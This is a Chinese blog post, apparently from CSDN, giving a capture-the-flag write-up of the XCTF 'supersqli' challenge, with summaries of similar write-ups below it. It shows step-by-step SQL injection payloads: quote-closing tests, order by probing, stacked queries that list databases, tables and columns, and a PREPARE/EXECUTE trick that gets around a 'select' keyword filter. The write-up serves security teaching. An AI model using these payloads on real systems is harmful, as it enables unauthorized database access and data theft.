攻防世界 Web supersqli 详解(堆叠注入)

最新推荐文章于 2024-05-18 19:58:13 发布
最新推荐文章于 2024-05-18 19:58:13 发布
阅读量923 收藏 2
点赞数 1
分类专栏: 攻防世界 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_70394438/article/details/126687131
版权

打开题目场景,根据题目名称,猜测为SQL注入漏洞,下面开始进行手工注入测试。

step1、先在方框中随便输入数字

输入1

输入0,无返回结果。

step2、在方框中随便输入字母

输入xxx,无返回结果。

 

 

step3、单独输入一个反斜杠字符   \

报错:error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''\'' at line 1

我们可以知道,当我们单独输入一个反斜杠字符后,报了一个数据库语法错误,证实了我们的猜测(即存在SQL注入漏洞),并找到了注入点,根据报错的信息可知,在注入点使用了单引号作为闭合,下面我们开始构造闭合。

step4、手工注入阶段——尝试select联合查询

构造payload:  xxx' or 1=1 #

 

若想使用union联合查询,首先要知道后台的select语句中选择了几个字段,构造paylad:

xxx' order by 3 #

报错:error 1054 : Unknown column '3 ' in 'order clause'    

没有第三个字段

xxx' order by 2 #

不报错,说明有两个字段

 

我们希望获得数据库名称,构造payload: 

xxx' union select 1,database() #

报错:return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);

说明select被过滤了,则不能使用select联合查询

step5、手工注入阶段——尝试使用堆叠查询

想获取所有数据库名称,构造payload:

xxx';show databases; #

返回如下:

对supersqli这个数据库感兴趣,想获取里面所有的表名称,构造payload:

xxx';use supersqli;show tables; #

返回如下:

对表名为1919810931114514的表感兴趣,获取表名为1919810931114514中的所有字段:


构造payload:

xxx';use supersqli;show columns from `1919810931114514` #

返回如下:

 


发现flag字段,获取字段值绕过select,采用预编译:

xxx';set @sql=concat('sel', 'ect * from `1919810931114514`');PREPARE kb from @sql;EXECUTE kb #

返回如下:

得到flag。

Zjxrhy
关注
专栏目录
攻防世界(web篇)---supersqli
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
06-09 808
一开始就是查询word中的数据,所以我们可以利用数据库修改名和列名的方法先把原来的words名字改成别的,再将1919810931114514的名字改为words再将改完名字后的中的flag字段改为 id (id同样需要show columns from word得到)然后我们用1’ or 1=1 --+直接就能得到flag...
supersqli_攻防世界
u014794949
10-23 425
进入题目发现是文本框提交,通过尝试确定闭合字符和注入点 order by确定存在2个字段 1' order by 2# union select查询发现关键字过滤 通过堆叠注入得到库名 1';show databases;# 尝试得到名 1';show tables;# 尝试得到两中的列名 1';show columns from `1919810931114514`;# 1';show columns from `words`;# flag列中比较可能存放答案,words
攻防世界web--supersqli
m0_60715541的博客
10-27 332
一道攻防世界上面的sql注入
攻防世界——supersqli
weixin_62281892的博客
09-18 1856
PHP preg_replace() 正则替换,与Javascript 正则替换不同,PHP preg_replace() 默认就是替换所有符号匹配条件的元素。到这里我们的列名就已经修改完毕,此时还会输出修改完成的words列名,最后通过万能钥匙1' or '1'='1即可得到输出。由于注入框的查询是对列id的搜索,此时参考两个的列名,需要将flag列名改为能够查找的id列(修改包括名称和数据类型)。上网冲浪了解了一波,好像是类似黑名单,这些词会被替换,那没办法了,我们就用堆叠注入
攻防世界supersqli
金 帛的博客
03-08 7941
攻防世界WP
攻防世界-web-supersqli
wuh2333的博客
06-07 960
我们看到,服务端默认的查询语句查询出两个字段,说明查询的是words,我们将1919810931114514的名字改成words并且将flag字段改为id字段不就行了吗?这里尝试按照基本思路进行验证,先确定注入点,然后通过union查询依次确认数据库名,名,字段名,最终获取到我们想要的字段信息。博客里提到的一种预编译绕过的方式可以让我们绕过waf的限制使用select语句,处理起来较为复杂,这里就不详细说明了。使用 or 永真修改查询条件可以将所有信息查询出来,因此这里肯定是存在sql注入的。
攻防世界---web---supersqli
最新发布
2201_75556700的博客
05-18 551
5、这里可以使用堆叠绕过(以分号来隔开每一次的sql语句的查询),查数据库名,再结合题目的提示可知,我们要找的信息在"supersqli"这个数据库中。6、查询"supersqli"数据库中的名,使用下面的方法,查到了两张。8、看到了flag字段,接着查询flag字段里面的信息。7、查询字段,由于名是字符串,所以需要用``反引号。2、判断注入点,这里输入1'报错了,说明存在注入点。4、查看数据库名,这里发现select被过滤了。3、查看列数,根据结果显示可知,有2列。的,并将其命名为 p。
攻防世界-supersqli
m0_63563528的博客
03-28 538
题目来源:强网杯 参考资料:金帛师傅的http://t.csdn.cn/KmxUY
攻防世界supersqli(堆叠注入
2302_79800344的博客
04-09 999
进入题目环境,有输入框与注入参数,推测类型为SQL注入:测试--注入类型为数字型还是字符型,构造payload:?inject=1 or 1=2 并提交: 发现页面依然正常,说明注入类型为字符型,则继续检查闭合方式,首先尝试单引号闭合,构造payload: ?inject=1' --+证实了闭合方式为单引号,继续测试字段数目(order by / group by ),经测试,字段数目为2。接着开始注数据库名,名等关键信息:首先尝试Union联合注入---构造payload: ?inject=1' uni
攻防世界 supersqli(堆叠注入
m0_56107268的博客
05-04 1827
1.首先判断有无注入点: 1’ and 1=1 # 1' and 1=2 # 2.进行注入 判断字段数 1' order by 2 # //两个字段 判断字段注入点 1' union select 1,2 # 出现一个正则替换 查看其他人博客,发现是使用堆叠注入 堆叠注入原理? mysql数据库sql语句的默认结束符是以";"号结尾,在执行多条sql语句时就要使用结束符隔 开,而堆叠注入其实就是通过结束符来执行多条sql语句 堆叠注入触发条件 堆叠注入触发的条件很
攻防世界 supersqli
lzu_lfl的博客
09-15 280
攻防世界 supersqli_WP
[攻防世界]supersqli
weixin_55466841的博客
04-30 259
输个单引号看看, 可以判断出来是字符型注入。 1' and 1=1# #有回显 1' and 1=2# #无回显 判断列数 1' order by 1# 1' order by 2# ... 2列。 用联合注入发现过滤了好多关键字 接下来用堆叠注入。 1'; show databases;# 1'; show tables;# ';show columns from `1919810931114514`;# ';show colu...
supersqli-攻防世界
szhangliwenya的博客
03-30 2186
因为 H 对应 ASCII 码值为 72,e 对应 ASCII 码值为 101,l 对应 ASCII 码值为 108,o 对应 ASCII 码值为 111。根据提交方式:POST注入,GET注入,HTTP HEAD注入。根据有无回显:联合注入,报错注入,布尔盲注,延时注入。1' and 1=1 #没报错判断为单引号字符注入。其他注入堆叠注入,宽字节注入,二次注入等。1' order by 3#报错。
攻防世界supersqli
zara_anna的博客
07-27 228
假设注入类型为数字型,注入点为id,分别输入上面的语句,那么第一行测试语句会返回id为1的查询结果,而第二行语句由于条件and 1=2不成立,所以查询结果为空。如果注入类型为字符型,将上面语句拼接到sql中,由于id的值都不匹配,所以应该是都不返回任何结果,但是如果id本身是int类型,实际查询过程中是会返回结果的,这可能是因为对输入的字符进行了截断并转换了类型,造成1 and 1=2在字符类型中会返回id为1的查询结果。
攻防世界-supersqli(堆叠注入
m0_62094846的博客
12-23 2176
输入1正常显示,输入1‘报错,可以判定是注入 输入2可以,3不行,可以知道有2个字段 然后判定回显位 1' union select 1,2# 过滤了挺多东西的,双写select也无法绕过 看了wp,是堆叠注入 查找数据库 ?inject=1';show databases;--+ 查看 -1';show tables;--+ 查看words -1';desc words;--+ 查看1919810931114514 -1'...
攻防世界web进阶区supersqli
gongjingege的博客
07-25 1885
打开链接,初步判断应该是sql注入 顺便查看一下源代码,发现sqlmap没有灵魂,估计应该不让用,得手工注入 先1’,报错 再–+,发现被正则过滤,大小写也不行 看了看大佬的wp,堆叠注入(呜,新名词。。。) inject=1’;show databases;# inject=1’;show tables;# 看一下这几个 1’;show columns from words;# 1’;show columns from 1919810931114514;# (字符串为名操作时要加反
攻防世界 web进阶区 supersqli
m0_51395584的博客
06-16 170
攻防世界 web进阶区 supersqli SQL注入中的堆叠注入
攻防世界——supersqli进阶
qq_62046696的博客
05-04 1578
关于sqil的题目,这个真的是知识面太杂了。我研究了好几天,才看懂了这个题解。 打开场景以后,发现的是一个文本框,然后试一下有没有sql注入 先输入1发现回显正常,然后输入1‘发现出现错误,然后就可以判断存在sql注入 然后判断一下有几列,进行 1' order by 2#回显正常,但是1' order by 3#回显错误,所以可以确定一共有2列 发现select被禁用 然后就想到运用推叠注入, 想到首先查询一下数据库,然后发现supersqli这个就是要找的数据库 然后进行查操作, ..
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值